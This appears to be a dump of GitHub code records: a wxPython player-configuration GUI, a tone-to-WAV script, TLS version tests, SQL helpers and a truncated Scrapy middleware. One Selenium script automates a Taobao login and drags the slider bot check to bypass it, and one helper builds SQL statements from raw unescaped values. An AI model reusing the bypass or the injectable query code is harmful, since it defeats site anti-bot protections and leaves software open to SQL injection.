dialogSizer.Add(videoDirectorySizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n buttonsSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n newButton = wx.Button(self, wx.ID_ANY, 'Save', size=(60,-1)) #@UndefinedVariable\n newButton.SetBackgroundColour(wx.Colour(210,210,210)) #@UndefinedVariable\n cancelButton = wx.Button(self, wx.ID_ANY, 'Cancel', size=(60,-1)) #@UndefinedVariable\n cancelButton.SetBackgroundColour(wx.Colour(210,210,210)) #@UndefinedVariable\n buttonsSizer.Add(newButton, 1, wx.ALL, 5) #@UndefinedVariable\n buttonsSizer.Add(cancelButton, 1, wx.ALL, 5) #@UndefinedVariable\n newButton.Bind(wx.EVT_BUTTON, self._onOk) #@UndefinedVariable\n cancelButton.Bind(wx.EVT_BUTTON, self._onCancel) #@UndefinedVariable\n dialogSizer.Add(buttonsSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n self.SetSizer(dialogSizer)\n\n\n def _onOk(self, event):\n playerHost = self._playerHostNameField.GetValue()\n midiPort = self._playerMidiPortField.GetValue()\n webPort = self._playerWebPortField.GetValue()\n midiOn = self._playerMidiOnField.GetValue()\n self._configurationClass.setPlayerConfig(self._playerId, playerHost, midiPort, webPort, midiOn)\n\n videoDir = self._videoDirectoryField.GetValue()\n ffmpegBinary = self._ffmpegBinaryField.GetValue()\n ffmpegH264Options = self._ffmpegOptionsField.GetValue()\n scaleX = self._scaleXField.GetValue()\n scaleY = self._scaleYField.GetValue()\n self._configurationClass.setVideoConfig(videoDir, ffmpegBinary, ffmpegH264Options, scaleX, scaleY)\n\n autoSend = self._autoSendOnField.GetValue()\n midiBcast = self._guiMidiBroadcastField.GetValue()\n midiBindAddress = self._guiMidiBindAddressField.GetValue()\n midiPort2 = self._guiMidiPortField.GetValue()\n winSize = self._windowSizeField.GetValue()\n winPos = self._windowPosField.GetValue()\n showDmx = self._showDmxField.GetValue()\n showKinect = self._showKinectField.GetValue()\n self._configurationClass.setGuiConfig(autoSend, midiBcast, midiBindAddress, midiPort2, winSize, winPos, showDmx, showKinect)\n\n self._configurationClass.saveConfig()\n wx.MessageBox('You must restart GUI to make sure all changes to take effect!', 'Info', wx.OK | wx.ICON_INFORMATION) #@UndefinedVariable\n self.Destroy()\n\n def _onCancel(self, event):\n self.Destroy()\n\nclass ConfigPlayerDialog(wx.Dialog): #@UndefinedVariable\n def __init__(self, parent, title, sendConfigCallback, configurationXmlString):\n super(ConfigPlayerDialog, self).__init__(parent=parent, title=title, size=(440, 700))\n\n self._sendConfigCallback = sendConfigCallback\n self._configurationClass = PlayerConfiguration(\"\", False)\n self._configurationClass.setFromXmlString(configurationXmlString)\n\n dialogSizer = wx.BoxSizer(wx.VERTICAL) #@UndefinedVariable\n self.SetBackgroundColour((180,180,180))\n\n infoText = wx.StaticText(self, wx.ID_ANY, \"Network:\") #@UndefinedVariable\n boldFont = infoText.GetFont()\n boldFont.SetWeight(wx.BOLD) #@UndefinedVariable\n infoText.SetFont(boldFont)\n dialogSizer.Add(infoText, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n playerBindName = self._configurationClass.getMidiServerAddress()\n playerBindNameSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n playerBindNameLabel = wx.StaticText(self, wx.ID_ANY, \"MIDI bind address:\") #@UndefinedVariable\n self._playerBindNameField = wx.TextCtrl(self, wx.ID_ANY, str(playerBindName), size=(120, -1)) #@UndefinedVariable\n playerBindNameSizer.Add(playerBindNameLabel, 1, wx.ALL, 5) #@UndefinedVariable\n playerBindNameSizer.Add(self._playerBindNameField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(playerBindNameSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n playerMidiPort = self._configurationClass.getMidiServerPort()\n playerMidiPortSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n playerMidiPortLabel = wx.StaticText(self, wx.ID_ANY, \"MIDI port:\") #@UndefinedVariable\n self._playerMidiPortField = wx.SpinCtrl(self, value=str(playerMidiPort), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._playerMidiPortField.SetRange(1024, 9999)\n playerMidiPortSizer.Add(playerMidiPortLabel, 1, wx.ALL, 5) #@UndefinedVariable\n playerMidiPortSizer.Add(self._playerMidiPortField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(playerMidiPortSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n useBroadcast = self._configurationClass.getMidiServerUsesBroadcast()\n playerMidiBcastOnSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n playerMidiBcastOnLabel = wx.StaticText(self, wx.ID_ANY, \"Broadcast:\") #@UndefinedVariable\n self._playerMidiBcastOnField = wx.CheckBox(self, wx.ID_ANY, \"Listen for MIDI broadcast packets.\") #@UndefinedVariable\n self._playerMidiBcastOnField.SetValue(useBroadcast)\n playerMidiBcastOnSizer.Add(playerMidiBcastOnLabel, 1, wx.ALL, 5) #@UndefinedVariable\n playerMidiBcastOnSizer.Add(self._playerMidiBcastOnField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(playerMidiBcastOnSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n playerWebBindName = self._configurationClass.getWebServerAddress()\n playerWebBindNameSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n playerWebBindNameLabel = wx.StaticText(self, wx.ID_ANY, \"Web bind address:\") #@UndefinedVariable\n self._playerWebBindNameField = wx.TextCtrl(self, wx.ID_ANY, str(playerWebBindName), size=(120, -1)) #@UndefinedVariable\n playerWebBindNameSizer.Add(playerWebBindNameLabel, 1, wx.ALL, 5) #@UndefinedVariable\n playerWebBindNameSizer.Add(self._playerWebBindNameField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(playerWebBindNameSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n playerWebPort = self._configurationClass.getWebServerPort()\n playerWebPortSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n playerWebPortLabel = wx.StaticText(self, wx.ID_ANY, \"Web port:\") #@UndefinedVariable\n self._playerWebPortField = wx.SpinCtrl(self, value=str(playerWebPort), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._playerWebPortField.SetRange(1024, 9999)\n playerWebPortSizer.Add(playerWebPortLabel, 1, wx.ALL, 5) #@UndefinedVariable\n playerWebPortSizer.Add(self._playerWebPortField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(playerWebPortSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n startId, numChannels, channelWidth, listenUniverse, dmxBinaryName = self._configurationClass.getDmxSettings()\n dmxUniverseSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n dmxUniverseLabel = wx.StaticText(self, wx.ID_ANY, \"DMX Universe:\") #@UndefinedVariable\n self._dmxUniverseField = wx.SpinCtrl(self, value=str(listenUniverse), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._dmxUniverseField.SetRange(0, 1024)\n dmxUniverseSizer.Add(dmxUniverseLabel, 1, wx.ALL, 5) #@UndefinedVariable\n dmxUniverseSizer.Add(self._dmxUniverseField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(dmxUniverseSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n dmxStartIdSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n dmxStartIdLabel = wx.StaticText(self, wx.ID_ANY, \"DMX Start ID:\") #@UndefinedVariable\n self._dmxStartIdField = wx.SpinCtrl(self, value=str(startId), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._dmxStartIdField.SetRange(0, 511)\n dmxStartIdSizer.Add(dmxStartIdLabel, 1, wx.ALL, 5) #@UndefinedVariable\n dmxStartIdSizer.Add(self._dmxStartIdField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(dmxStartIdSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n dmxChannelWidthSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n dmxChannelWidthLabel = wx.StaticText(self, wx.ID_ANY, \"DMX channel width:\") #@UndefinedVariable\n self._dmxChannelWidthField = wx.SpinCtrl(self, value=str(channelWidth), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._dmxChannelWidthField.SetRange(1, 32)\n dmxChannelWidthSizer.Add(dmxChannelWidthLabel, 1, wx.ALL, 5) #@UndefinedVariable\n dmxChannelWidthSizer.Add(self._dmxChannelWidthField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(dmxChannelWidthSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n dmxNumChannelsSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n dmxNumChannelsLabel = wx.StaticText(self, wx.ID_ANY, \"DMX channels:\") #@UndefinedVariable\n self._dmxNumChannelsField = wx.SpinCtrl(self, value=str(numChannels), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._dmxNumChannelsField.SetRange(0, 16)\n dmxNumChannelsSizer.Add(dmxNumChannelsLabel, 1, wx.ALL, 5) #@UndefinedVariable\n dmxNumChannelsSizer.Add(self._dmxNumChannelsField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(dmxNumChannelsSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n dmxBinaryNameSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n dmxBinaryNameLabel = wx.StaticText(self, wx.ID_ANY, \"DMX binary:\") #@UndefinedVariable\n self._dmxBinaryNameField = wx.TextCtrl(self, wx.ID_ANY, str(dmxBinaryName), size=(120, -1)) #@UndefinedVariable\n dmxBinaryNameSizer.Add(dmxBinaryNameLabel, 1, wx.ALL, 5) #@UndefinedVariable\n dmxBinaryNameSizer.Add(self._dmxBinaryNameField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(dmxBinaryNameSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n\n infoText = wx.StaticText(self, wx.ID_ANY, \"Window:\") #@UndefinedVariable\n infoText.SetFont(boldFont)\n dialogSizer.Add(infoText, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n fullscreenMode = self._configurationClass.getFullscreenMode()\n fullscreenSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n fullscreenLabel = wx.StaticText(self, wx.ID_ANY, \"Fullscreen:\") #@UndefinedVariable\n self._fullscreenField = wx.ComboBox(self, wx.ID_ANY, size=(200, -1), choices=[\"off\", \"on\", \"auto\"], style=wx.CB_READONLY) #@UndefinedVariable\n self._fullscreenField.SetStringSelection(fullscreenMode)\n fullscreenSizer.Add(fullscreenLabel, 1, wx.ALL, 5) #@UndefinedVariable\n fullscreenSizer.Add(self._fullscreenField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(fullscreenSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n resolutionX, resolutionY = self._configurationClass.getResolution()\n resolutionXSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n resolutionXLabel = wx.StaticText(self, wx.ID_ANY, \"X resolution:\") #@UndefinedVariable\n self._resolutionXField = wx.SpinCtrl(self, value=str(resolutionX), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._resolutionXField.SetRange(400, 4000)\n resolutionXSizer.Add(resolutionXLabel, 1, wx.ALL, 5) #@UndefinedVariable\n resolutionXSizer.Add(self._resolutionXField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(resolutionXSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n resolutionYSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n resolutionYLabel = wx.StaticText(self, wx.ID_ANY, \"Y resolution:\") #@UndefinedVariable\n self._resolutionYField = wx.SpinCtrl(self, value=str(resolutionY), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._resolutionYField.SetRange(300, 3000)\n resolutionYSizer.Add(resolutionYLabel, 1, wx.ALL, 5) #@UndefinedVariable\n resolutionYSizer.Add(self._resolutionYField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(resolutionYSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n autoPosition = self._configurationClass.isAutoPositionEnabled()\n autopositionSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n autopositionLabel = wx.StaticText(self, wx.ID_ANY, \"Autoposition:\") #@UndefinedVariable\n self._autopositionField = wx.CheckBox(self, wx.ID_ANY, \"Let OS position window.\") #@UndefinedVariable\n self._autopositionField.SetValue(autoPosition)\n autopositionSizer.Add(autopositionLabel, 1, wx.ALL, 5) #@UndefinedVariable\n autopositionSizer.Add(self._autopositionField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(autopositionSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n positionX, positionY = self._configurationClass.getPosition()\n positionXSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n positionXLabel = wx.StaticText(self, wx.ID_ANY, \"X position:\") #@UndefinedVariable\n self._positionXField = wx.SpinCtrl(self, value=str(positionX), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._positionXField.SetRange(-1, 8000)\n positionXSizer.Add(positionXLabel, 1, wx.ALL, 5) #@UndefinedVariable\n positionXSizer.Add(self._positionXField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(positionXSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n positionYSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n positionYLabel = wx.StaticText(self, wx.ID_ANY, \"Y position:\") #@UndefinedVariable\n self._positionYField = wx.SpinCtrl(self, value=str(positionY), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._positionYField.SetRange(-1, 6000)\n positionYSizer.Add(positionYLabel, 1, wx.ALL, 5) #@UndefinedVariable\n positionYSizer.Add(self._positionYField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(positionYSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n avoidScreensaver = self._configurationClass.isAvoidScreensaverEnabled()\n avoidScreensaverSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n avoidScreensaverLabel = wx.StaticText(self, wx.ID_ANY, \"Screensaver:\") #@UndefinedVariable\n self._avoidScreensaverField = wx.CheckBox(self, wx.ID_ANY, \"Try to avoid screensaver.\") #@UndefinedVariable\n self._avoidScreensaverField.SetValue(avoidScreensaver)\n avoidScreensaverSizer.Add(avoidScreensaverLabel, 1, wx.ALL, 5) #@UndefinedVariable\n avoidScreensaverSizer.Add(self._avoidScreensaverField, 2, wx.ALL, 5) #@UndefinedVariable\n if(sys.platform != \"darwin\"):\n dialogSizer.Add(avoidScreensaverSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n infoText = wx.StaticText(self, wx.ID_ANY, \"Startup:\") #@UndefinedVariable\n infoText.SetFont(boldFont)\n dialogSizer.Add(infoText, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n startConfig = self._configurationClass.getStartConfig()\n startConfigSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n startConfigLabel = wx.StaticText(self, wx.ID_ANY, \"Start configuration:\") #@UndefinedVariable\n self._startConfigField = wx.TextCtrl(self, wx.ID_ANY, str(startConfig), size=(120, -1)) #@UndefinedVariable\n startConfigSizer.Add(startConfigLabel, 1, wx.ALL, 5) #@UndefinedVariable\n startConfigSizer.Add(self._startConfigField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(startConfigSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n startNote = self._configurationClass.getStartNoteNumber()\n startNoteSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n startNoteLabel = wx.StaticText(self, wx.ID_ANY, \"Start note:\") #@UndefinedVariable\n self._startNoteField = wx.SpinCtrl(self, value=str(startNote), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._startNoteField.SetRange(-1, 127)\n startNoteSizer.Add(startNoteLabel, 1, wx.ALL, 5) #@UndefinedVariable\n startNoteSizer.Add(self._startNoteField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(startNoteSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n videoDir = self._configurationClass.getVideoDir()\n videoDirSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n videoDirLabel = wx.StaticText(self, wx.ID_ANY, \"Video directory:\") #@UndefinedVariable\n self._videoDirField = wx.TextCtrl(self, wx.ID_ANY, str(videoDir), size=(120, -1)) #@UndefinedVariable\n videoDirSizer.Add(videoDirLabel, 1, wx.ALL, 5) #@UndefinedVariable\n videoDirSizer.Add(self._videoDirField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(videoDirSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n configDir = self._configurationClass.getConfigDir()\n configDirSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n configDirLabel = wx.StaticText(self, wx.ID_ANY, \"Configuration directory:\") #@UndefinedVariable\n self._configDirField = wx.TextCtrl(self, wx.ID_ANY, str(configDir), size=(120, -1)) #@UndefinedVariable\n configDirSizer.Add(configDirLabel, 1, wx.ALL, 5) #@UndefinedVariable\n configDirSizer.Add(self._configDirField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(configDirSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n\n buttonsSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n newButton = wx.Button(self, wx.ID_ANY, 'Save', size=(60,-1)) #@UndefinedVariable\n newButton.SetBackgroundColour(wx.Colour(210,210,210)) #@UndefinedVariable\n cancelButton = wx.Button(self, wx.ID_ANY, 'Cancel', size=(60,-1)) #@UndefinedVariable\n cancelButton.SetBackgroundColour(wx.Colour(210,210,210)) #@UndefinedVariable\n buttonsSizer.Add(newButton, 1, wx.ALL, 5) #@UndefinedVariable\n buttonsSizer.Add(cancelButton, 1, wx.ALL, 5) #@UndefinedVariable\n newButton.Bind(wx.EVT_BUTTON, self._onOk) #@UndefinedVariable\n cancelButton.Bind(wx.EVT_BUTTON, self._onCancel) #@UndefinedVariable\n dialogSizer.Add(buttonsSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n self.SetSizer(dialogSizer)\n\n\n def _onOk(self, event):\n startConfig = self._startConfigField.GetValue()\n startNote = noteToNoteString(self._startNoteField.GetValue())\n videoDir = self._videoDirField.GetValue()\n configDir = self._configDirField.GetValue()\n self._configurationClass.setStartupConfig(startConfig, startNote, videoDir, configDir)\n\n resX = self._resolutionXField.GetValue()\n resY = self._resolutionYField.GetValue()\n fullscreenMode = self._fullscreenField.GetValue()\n isAutoPos = self._autopositionField.GetValue()\n posX = self._positionXField.GetValue()\n posY = self._positionYField.GetValue()\n isAvoidScreensaver = self._avoidScreensaverField.GetValue()\n self._configurationClass.setScreenConfig(resX, resY, fullscreenMode, isAutoPos, posX, posY, isAvoidScreensaver)\n\n\n midiBcast = self._playerMidiBcastOnField.GetValue()\n midiAddress = self._playerBindNameField.GetValue()\n midiPort = self._playerMidiPortField.GetValue()\n webAddress = self._playerWebBindNameField.GetValue()\n webPort = self._playerWebPortField.GetValue()\n dmxUniverse = self._dmxUniverseField.GetValue()\n dmxChannelStart = self._dmxStartIdField.GetValue()\n dmxChannelWidth = self._dmxChannelWidthField.GetValue()\n dmxNumChannels = self._dmxNumChannelsField.GetValue()\n dmxBinaryName = self._dmxBinaryNameField.GetValue()\n self._configurationClass.setServerConfig(midiBcast, midiAddress, midiPort, webAddress, webPort,\n dmxUniverse, dmxChannelStart, dmxChannelWidth, dmxNumChannels, dmxBinaryName)\n xmlString = self._configurationClass.getXmlString()\n self._sendConfigCallback(xmlString)\n wx.MessageBox('You must restart Player to make sure all changes to take effect!', 'Info', wx.OK | wx.ICON_INFORMATION) #@UndefinedVariable\n self.Destroy()\n\n def _onCancel(self, event):\n self.Destroy()\n","repo_name":"perchrn/TaktPlayer","sub_path":"gui/configurationGui/FileMenu.py","file_name":"FileMenu.py","file_ext":"py","file_size_in_byte":37427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"73715209807","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport pylab\nfrom scipy.io.wavfile import write\nimport os\n# http://picosanta.tistory.com/13\n\n# sampling rate\nFs = 44100.0 # Hz\n\n# play length\ntlen = float(raw_input('Input Play Time(s): ')) # 소리 지속 시간\nTs = 1/Fs # sampling interval\nt = np.arange(0, tlen, Ts) # time array\n\n# generate signal\nsin_freq = float(raw_input('Input Frequency : ')) # 주파수\nsignal = np.sin(2*np.pi*sin_freq*t)\n\n# generate noise\nnoise = 0 # np.random.uniform(-1, 1, len(t))*0.1\n\n# signal + noise\nsignal_n = signal + noise\n \n# fft\nsignal_f = np.fft.fft(signal_n)\nfreq = np.fft.fftfreq(len(t), Ts)\n\n# plot\npylab.plot(freq, 20*np.log10(np.abs(signal_f)))\npylab.xlim(0, Fs/2)\npylab.show()\n\n# save as wav file\nscaled = np.int16(signal_n/np.max(np.abs(signal_n)) * 32767)\nwrite('test.wav', Fs, scaled)\n\n# play wav file\nos.system(\"test.wav\")\n","repo_name":"khw5123/Project","sub_path":"Python/FrequencyToWav.py","file_name":"FrequencyToWav.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"1270386452","text":"# -*- coding: utf-8 -*-\n# !usr/bin/env python\nfrom selenium import webdriver\nimport requests\nimport time\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.common.keys import Keys\n\nchorme_header = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2652.2 Safari/537.36'}\n\ntry:\n web_browser = webdriver.Chrome(executable_path=(r'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chromedriver.exe'))\nexcept Exception as e:\n print(e)\nweburl = 'https://login.taobao.com/member/login.jhtml?spm=a21bo.2017.754894437.1.760011d92ECDfo&f=top&redirectURL=https%3A%2F%2Fwww.taobao.com%2F%3Fspm%3Da2107.1.0.0.638411d968vtCC'\n#没必要去去httpstatu,浪费事件\n#httpcode = requests.get(weburl, headers = chorme_header).status_code\nweb_browser.maximize_window()\nweb_browser.get(weburl)\ntry:\n web_browser.find_element_by_id('fm-login-id').click()\n web_browser.find_element_by_id('fm-login-id').send_keys('loginid')\n web_browser.find_element_by_id('fm-login-password').send_keys('password')\n #先执行点击操作,\n web_browser.find_element_by_xpath(\"//button[@tabindex='3']\").click()\n #(\"//input[@type='submit' and @value='something']\").click()\n #web_browser.find_element_by_xpath(\"//[@type='submit']\").click()\n #nc_1__scale_text\n #web_browser.find_element_by_id('nc_1__scale_text')\n WebDriverWait(web_browser, 5)\n ActionChains(web_browser).drag_and_drop_by_offset(web_browser.find_element_by_xpath(\"//*[@id='nc_1_n1z']\"), 280, 0).perform()\n #等待js加载\n WebDriverWait(web_browser, 5)\n #点击登陆按钮 其实也可以直接回车\n web_browser.find_element_by_xpath(\"//button[@tabindex='3']\").click()\n time.sleep(5)\n web_browser.get_screenshot_as_file('d:\\\\python_file\\\\%s.png' % (time.strftime('%Y-%m-%d-%H-%M-%S')))\n print('截图成功!')\nexcept Exception as E:\n print(E)\n web_browser.close()\n","repo_name":"ron-dicaprio/pydev","sub_path":"selenium_login.py","file_name":"selenium_login.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"38346901168","text":"import functools\nimport socket\nimport ssl\n\nimport pytest\n\nfrom elastic_transport import (\n AiohttpHttpNode,\n NodeConfig,\n RequestsHttpNode,\n TlsError,\n Urllib3HttpNode,\n)\nfrom elastic_transport._compat import await_if_coro\nfrom elastic_transport.client_utils import url_to_node_config\n\nTLSv1_0_URL = \"https://tls-v1-0.badssl.com:1010\"\nTLSv1_1_URL = \"https://tls-v1-1.badssl.com:1011\"\nTLSv1_2_URL = \"https://tls-v1-2.badssl.com:1012\"\n\npytestmark = pytest.mark.asyncio\nnode_classes = pytest.mark.parametrize(\n \"node_class\", [AiohttpHttpNode, Urllib3HttpNode, RequestsHttpNode]\n)\n\nsupported_version_params = [\n (TLSv1_0_URL, ssl.PROTOCOL_TLSv1),\n (TLSv1_1_URL, ssl.PROTOCOL_TLSv1_1),\n (TLSv1_2_URL, ssl.PROTOCOL_TLSv1_2),\n (TLSv1_2_URL, None),\n]\nunsupported_version_params = [\n (TLSv1_0_URL, None),\n (TLSv1_1_URL, None),\n (TLSv1_0_URL, ssl.PROTOCOL_TLSv1_1),\n (TLSv1_0_URL, ssl.PROTOCOL_TLSv1_2),\n (TLSv1_1_URL, ssl.PROTOCOL_TLSv1_2),\n]\n\ntry:\n from ssl import TLSVersion\nexcept ImportError:\n pass\nelse:\n supported_version_params.extend(\n [\n (TLSv1_0_URL, TLSVersion.TLSv1),\n (TLSv1_1_URL, TLSVersion.TLSv1_1),\n (TLSv1_2_URL, TLSVersion.TLSv1_2),\n ]\n )\n unsupported_version_params.extend(\n [\n (TLSv1_0_URL, TLSVersion.TLSv1_1),\n (TLSv1_0_URL, TLSVersion.TLSv1_2),\n (TLSv1_1_URL, TLSVersion.TLSv1_2),\n (TLSv1_0_URL, TLSVersion.TLSv1_3),\n (TLSv1_1_URL, TLSVersion.TLSv1_3),\n (TLSv1_2_URL, TLSVersion.TLSv1_3),\n ]\n )\n\n\n@functools.lru_cache()\ndef tlsv1_1_supported() -> bool:\n # OpenSSL distributions on Ubuntu/Debian disable TLSv1.1 and before incorrectly.\n # So we try to detect that and skip tests when needed.\n try:\n sock = socket.create_connection((\"tls-v1-1.badssl.com\", 1011))\n ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)\n sock = ctx.wrap_socket(sock, server_hostname=\"tls-v1-1.badssl.com\")\n sock.close()\n except ssl.SSLError:\n return False\n return True\n\n\n@node_classes\n@pytest.mark.parametrize(\n [\"url\", \"ssl_version\"],\n supported_version_params,\n)\nasync def test_supported_tls_versions(node_class, url: str, ssl_version: int):\n if url in (TLSv1_0_URL, TLSv1_1_URL) and not tlsv1_1_supported():\n pytest.skip(\"TLSv1.1 isn't supported by this OpenSSL distribution\")\n node_config = url_to_node_config(url).replace(ssl_version=ssl_version)\n node = node_class(node_config)\n\n resp, _ = await await_if_coro(node.perform_request(\"GET\", \"/\"))\n assert resp.status == 200\n\n\n@node_classes\n@pytest.mark.parametrize(\n [\"url\", \"ssl_version\"],\n unsupported_version_params,\n)\nasync def test_unsupported_tls_versions(node_class, url: str, ssl_version: int):\n node_config = url_to_node_config(url).replace(ssl_version=ssl_version)\n node = node_class(node_config)\n\n with pytest.raises(TlsError) as e:\n await await_if_coro(node.perform_request(\"GET\", \"/\"))\n assert \"unsupported protocol\" in str(e.value) or \"handshake failure\" in str(e.value)\n\n\n@node_classes\n@pytest.mark.parametrize(\"ssl_version\", [0, \"TLSv1\", object()])\ndef test_ssl_version_value_error(node_class, ssl_version):\n with pytest.raises(ValueError) as e:\n node_class(NodeConfig(\"https\", \"localhost\", 9200, ssl_version=ssl_version))\n assert str(e.value) == (\n f\"Unsupported value for 'ssl_version': {ssl_version!r}. Must be either \"\n \"'ssl.PROTOCOL_TLSvX' or 'ssl.TLSVersion.TLSvX'\"\n )\n","repo_name":"elastic/elastic-transport-python","sub_path":"tests/node/test_tls_versions.py","file_name":"test_tls_versions.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"65"} +{"seq_id":"5670672239","text":"def update_query(query_dict: dict) -> str:\n values = ''\n for key, value in query_dict.items():\n values += f'{key}=\\'{value}\\', '\n index = values.rfind(',')\n return values[:index] + ' '\n\n\ndef insert_query(query_dict: dict) -> tuple[tuple, tuple]:\n columns = []\n values = []\n for key, value in query_dict.items():\n columns.append(key)\n values.append(value)\n return tuple(columns), tuple(values)\n\n","repo_name":"kirode/sql_tests","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"17918083677","text":"# https://codeforces.com/group/hPNKVTNJU1/contest/329955/problem/M\n\nn=int(input())\ns=list(map(int,input().split()))\ns.sort()\nc=0\nk=1\nfor i in range(n):\n if s[i]>=k:\n c+=1\n k+=1\nprint(c)\n \n ","repo_name":"tomsjoseph2410/CP-Hub-Codeforces-Week-1","sub_path":"M. Polycarp Training.py","file_name":"M. Polycarp Training.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"72822768526","text":"from selenium.webdriver.support.ui import WebDriverWait\n\nfrom scrapy.http import HtmlResponse\n\nfrom scrapy_selenium import SeleniumRequest, SeleniumMiddleware\n\nimport time\n\n\nclass YouTubeMiddleware(SeleniumMiddleware):\n \"\"\"\n Inherit from the 